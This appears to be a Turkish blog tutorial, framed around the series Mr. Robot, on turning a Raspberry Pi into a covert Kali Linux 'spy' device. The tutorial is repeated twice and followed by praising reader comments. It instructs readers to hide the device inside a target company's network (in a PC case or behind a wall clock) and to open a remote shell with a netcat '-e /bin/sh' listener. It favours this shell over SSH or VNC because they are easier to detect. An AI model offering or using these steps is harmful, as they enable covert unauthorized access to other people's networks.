Casus Robot , Oyuncak , Yazılımı Nasıl Yapılır ?
Mr.Robot adlı bir hackerin hayatını anlatan diziyi bilmeyeniniz yoktu bilmeyeniniz varsada zaten diziyi anlatmayacağımız için sıkıntı yok neyse diziyi izleyenler bilir Elliot adındaki hackere kötü bir firmanın datacenterına sızıp ısıtma soğutma gibi sistemleri manipüle ederek bozması isteniyordu oda aşağıda anlatılmakta olan yöntem ile yaptı bunu buyrun ;
1. Adım: Kali’nin ARM versiyonunu indirin
Tekrardan hatırlayalım, Kali Linux , hackerların ve güvenlik uzmanlarının işletim sistemiydi. İlk adım, tabi ki, Raspberry Pi ile uyumlu bir Kali versiyonu edinmek. Raspberry Pi ve birçok mobil cihaz ARM tipi işlemciler kullanırlar, bunun sebebi enerji açısından tasarruflu olmaları ve ısınma problemlerinin az olmasıdır. ARM tipi işlemci dolayısıyla Kali’ninde bu sisteme özel ve uygun olarak derlenmesi gerek.
Neyse ki Offensive Security’i şirketi bunu halletmiş durumda kendilerine minnetlerimi sunarım .
Offensive Security’nin sitesindeki download bölümüne geçelim ve işletim sistemimizin Raspberry Pi versiyonunu indirelim. İndirdikten sonra herhangi bir zip programıyla dosyaları çıkartalım.
2. Adım: Win32 Disk Imager programını indirip yükleyin
SourgeForge sitesinden Win32 Disk Imager programını indirip yükleyelim. Bu program sayesinde imaj dosyalarını SD kart veya USB belleklere yazabiliyoruz. Tavsiyem en az 4 gb boyutlu hızlı bir SD kart kullanmanız. Piyasada uygun fiyata bulabilirsiniz.
3. Adım: Disk Imager programını çalıştırın
Şimdi yüklemiş olduğumuz Disk Imager programını sağ tuş tıklayıp “Yönetici olarak çalıştır” seçeneğiyle açıyoruz.
Image file kısmında, açtığımız Raspberry Pi imajını gösteriyoruz. Device olarak SD kartımızın bulunduğu harf lokasyonunu seçiyoruz. Seçimlerimizi yaptıktan sonra “Write” butonuyla yazdırmaya başlıyoruz. Yazma işlemi sırasında sabırlı olunuz biraz vakit alacaktır.
Eğer LINUX kullanıyorsanız işler biraz daha kolaydır. Herhangi bir şey yüklemenize gerek yok. Linux’te ”dd” komutu mevcut. Bu komut adli bilişim işlemlerinde disk imajı oluşturmak için kullanılır. Gerekli işlemi yapmak için kullanacağımız komutu görelim. Varsayalım ki imajımızın adı Kali-RPI.img olsun, SD kart lokasyonu /dev/sdc ve blok boyutunu (block size) 512k olarak belirlersek, yazacağımız komut şöyle olacaktır:
kali > dd if =Kali-RPI.img of =/dev/sdc bs=512k
4. Adım: SD kartı Raspberry Pi’a yerleştirelim.
Yüklemeleri tamamladıktan sonra SD kartı PC den alıp Raspberry Pi’a aktaralım ve boot edelim/başlatalım. Başladıktan sonra sistem, bizleri otomatik olarak komut satırına aktaracak, kullanıcı adı ve şifre isteyecek.
Username: root
Password: toor
yazıp ardından:
Kali> startx
yazıyoruz. Bu startx komutu X11 olarakta bilinen X Pencere Sistemi’ni başlatır. Kısaca tanımı yapalım X Pencere Sistemi (X), daha çok GNU/Linux ve Unix benzeri işletim sistemlerinde kullanılan grafik arayüz altyapısıdır. Genel olarak ekrana çizdirme ve kullanıcıdan geribesleme alma işlerini yapan X sunucusunu, ve uygulamaların sunucu ile haberleşme için kullanabileceği X kütüphanesini kapsar.
Ve işte, Kali yüklü casus Raspberry Pi bilgisayarımız hazır.
5. Adım: Raspberry Pi’da Netcat Listener uygulamasını başlatın
Geldiğimiz bu aşamada Kali yüklü Raspberry Pi bilgisayarımız var artık ve onu bahsettiğimiz kötü firmanın ağına bağlayabiliriz. Raspberry Pi Ethernet bağlantısına sahiptir, isterseniz de wireless adaptör takabilirsiniz. Bu mini ajanımız çok ufak olduğundan görünmeyecek şekilde her yere monte edilebilir; bilgisayar kasasına, telefon içerisine ve hatta bir duvar saatinin arkasına bile.
Raspberry Pi ağa bağladıktan sonra Netcat Listener uygulamasını başlatabiliriz artık. Uygulama kali içerisinde mevcuttur. Netcat uygulamasını aşağıdaki komutu yazarak başlatıyoruz:
Kali> nc –l –p6996 –e /bin/sh
Bu komut Raspberry Pi üzerindeki terminale 6996 portundan ulaşım açar.
Artık Elliot, Kali üzerinden Netcat kullanarak Raspberry Pi’a tekrardan ulaşabilir. Bunu yapmak için kullanması gereken komut şudur:
Kali> nc 192.168.1.105 6996
Bundan sonra ifconfig sorgusuyla Elliot, Raspberry Pi terminalinde olduğunu görebilir. Uyarmak isteriz ki bu komutu kullanmadan Raspberry Pi’a ait ip adresinden emin olmak gerekir.
Casus Raspberry Pi cihazımıza bağlanmanın, tabi ki başka yöntemleri de vardır. SSH kullanılabilir mesela, SSH, Secure Shell teriminin kısaltılmış halidir, tanımını yapacak olursak; SSH bilgisayar-bilgisayar, bilgisayar-sunucu, sunucu-sunucu bağlantı çeşitleri içerisinde güvenli iletişimi sağlayan bir protokoldür.
Eğer grafiksel arayüz ile bağlanmak istenirse VNC serveri yüklenebilir. Yine tanım yapalım; VNC, özetle herhangi bir ağ sunucusu üzerinde çalışan grafik arayüz uygulamalarına herhangi bir başka ağ üzerindeki bir bilgisayardan kolaylıkla ve hızla erişerek bu uygulamaları kullanabilmemizi ve yönetmemizi sağlayan platform bağımsız bir yapı. Örnek bir VNC bağlantısı resmi aşağıda verilmiştir.
Yukarıda bahsettiğimiz son 2 bağlantı türünü tercih etmeme sebebimiz, kötü niyetli firmamızın ağında tespit edilme olasılıklarının daha yüksek olmasıdır.
Mr.Robot adlı bir hackerin hayatını anlatan diziyi bilmeyeniniz yoktu bilmeyeniniz varsada zaten diziyi anlatmayacağımız için sıkıntı yok neyse diziyi izleyenler bilir Elliot adındaki hackere kötü bir firmanın datacenterına sızıp ısıtma soğutma gibi sistemleri manipüle ederek bozması isteniyordu oda aşağıda anlatılmakta olan yöntem ile yaptı bunu buyrun ;
Öncelikle Rasperrry Pi'nizin olması gerekmekte eğerki elinizde yoksa googleye gelip rasperry yazarak alabilirsiniz kendisi tam donanımlı mini bilgisayardır , fiyatı ortalama 140 - 170 civarları arasında seyretmektedir .
1. Adım: Kali’nin ARM versiyonunu indirin
Tekrardan hatırlayalım, Kali Linux , hackerların ve güvenlik uzmanlarının işletim sistemiydi. İlk adım, tabi ki, Raspberry Pi ile uyumlu bir Kali versiyonu edinmek. Raspberry Pi ve birçok mobil cihaz ARM tipi işlemciler kullanırlar, bunun sebebi enerji açısından tasarruflu olmaları ve ısınma problemlerinin az olmasıdır. ARM tipi işlemci dolayısıyla Kali’ninde bu sisteme özel ve uygun olarak derlenmesi gerek.
Neyse ki Offensive Security’i şirketi bunu halletmiş durumda kendilerine minnetlerimi sunarım .
Offensive Security’nin sitesindeki download bölümüne geçelim ve işletim sistemimizin Raspberry Pi versiyonunu indirelim. İndirdikten sonra herhangi bir zip programıyla dosyaları çıkartalım.
2. Adım: Win32 Disk Imager programını indirip yükleyin
SourgeForge sitesinden Win32 Disk Imager programını indirip yükleyelim. Bu program sayesinde imaj dosyalarını SD kart veya USB belleklere yazabiliyoruz. Tavsiyem en az 4 gb boyutlu hızlı bir SD kart kullanmanız. Piyasada uygun fiyata bulabilirsiniz.
3. Adım: Disk Imager programını çalıştırın
Şimdi yüklemiş olduğumuz Disk Imager programını sağ tuş tıklayıp “Yönetici olarak çalıştır” seçeneğiyle açıyoruz.
Image file kısmında, açtığımız Raspberry Pi imajını gösteriyoruz. Device olarak SD kartımızın bulunduğu harf lokasyonunu seçiyoruz. Seçimlerimizi yaptıktan sonra “Write” butonuyla yazdırmaya başlıyoruz. Yazma işlemi sırasında sabırlı olunuz biraz vakit alacaktır.
Eğer LINUX kullanıyorsanız işler biraz daha kolaydır. Herhangi bir şey yüklemenize gerek yok. Linux’te ”dd” komutu mevcut. Bu komut adli bilişim işlemlerinde disk imajı oluşturmak için kullanılır. Gerekli işlemi yapmak için kullanacağımız komutu görelim. Varsayalım ki imajımızın adı Kali-RPI.img olsun, SD kart lokasyonu /dev/sdc ve blok boyutunu (block size) 512k olarak belirlersek, yazacağımız komut şöyle olacaktır:
kali > dd if =Kali-RPI.img of =/dev/sdc bs=512k
4. Adım: SD kartı Raspberry Pi’a yerleştirelim.
Yüklemeleri tamamladıktan sonra SD kartı PC den alıp Raspberry Pi’a aktaralım ve boot edelim/başlatalım. Başladıktan sonra sistem, bizleri otomatik olarak komut satırına aktaracak, kullanıcı adı ve şifre isteyecek.
Username: root
Password: toor
yazıp ardından:
Kali> startx
yazıyoruz. Bu startx komutu X11 olarakta bilinen X Pencere Sistemi’ni başlatır. Kısaca tanımı yapalım X Pencere Sistemi (X), daha çok GNU/Linux ve Unix benzeri işletim sistemlerinde kullanılan grafik arayüz altyapısıdır. Genel olarak ekrana çizdirme ve kullanıcıdan geribesleme alma işlerini yapan X sunucusunu, ve uygulamaların sunucu ile haberleşme için kullanabileceği X kütüphanesini kapsar.
Ve işte, Kali yüklü casus Raspberry Pi bilgisayarımız hazır.
5. Adım: Raspberry Pi’da Netcat Listener uygulamasını başlatın
Geldiğimiz bu aşamada Kali yüklü Raspberry Pi bilgisayarımız var artık ve onu bahsettiğimiz kötü firmanın ağına bağlayabiliriz. Raspberry Pi Ethernet bağlantısına sahiptir, isterseniz de wireless adaptör takabilirsiniz. Bu mini ajanımız çok ufak olduğundan görünmeyecek şekilde her yere monte edilebilir; bilgisayar kasasına, telefon içerisine ve hatta bir duvar saatinin arkasına bile.
Raspberry Pi ağa bağladıktan sonra Netcat Listener uygulamasını başlatabiliriz artık. Uygulama kali içerisinde mevcuttur. Netcat uygulamasını aşağıdaki komutu yazarak başlatıyoruz:
Kali> nc –l –p6996 –e /bin/sh
Bu komut Raspberry Pi üzerindeki terminale 6996 portundan ulaşım açar.
Artık Elliot, Kali üzerinden Netcat kullanarak Raspberry Pi’a tekrardan ulaşabilir. Bunu yapmak için kullanması gereken komut şudur:
Kali> nc 192.168.1.105 6996
Bundan sonra ifconfig sorgusuyla Elliot, Raspberry Pi terminalinde olduğunu görebilir. Uyarmak isteriz ki bu komutu kullanmadan Raspberry Pi’a ait ip adresinden emin olmak gerekir.
Casus Raspberry Pi cihazımıza bağlanmanın, tabi ki başka yöntemleri de vardır. SSH kullanılabilir mesela, SSH, Secure Shell teriminin kısaltılmış halidir, tanımını yapacak olursak; SSH bilgisayar-bilgisayar, bilgisayar-sunucu, sunucu-sunucu bağlantı çeşitleri içerisinde güvenli iletişimi sağlayan bir protokoldür.
Eğer grafiksel arayüz ile bağlanmak istenirse VNC serveri yüklenebilir. Yine tanım yapalım; VNC, özetle herhangi bir ağ sunucusu üzerinde çalışan grafik arayüz uygulamalarına herhangi bir başka ağ üzerindeki bir bilgisayardan kolaylıkla ve hızla erişerek bu uygulamaları kullanabilmemizi ve yönetmemizi sağlayan platform bağımsız bir yapı. Örnek bir VNC bağlantısı resmi aşağıda verilmiştir.
Yukarıda bahsettiğimiz son 2 bağlantı türünü tercih etmeme sebebimiz, kötü niyetli firmamızın ağında tespit edilme olasılıklarının daha yüksek olmasıdır.
kendim de bir Rasperry almayı düşünüyordum ve artık bu sunumdan sonra kesin olarak birtane alacağım... Sadece Hack konusunda değil Konuda anlatığın gibi, elektrik veya yer tasaruffu da en iyi örneklerinden biri. Paylaşım ve Emeğine teşekkür ederim
YanıtlaSilEllerine sağlık güzel konuya değinmişsin :)
YanıtlaSilEllerine sağlık.
YanıtlaSilellerine sağlık kardeşim harika anlatım :)
YanıtlaSil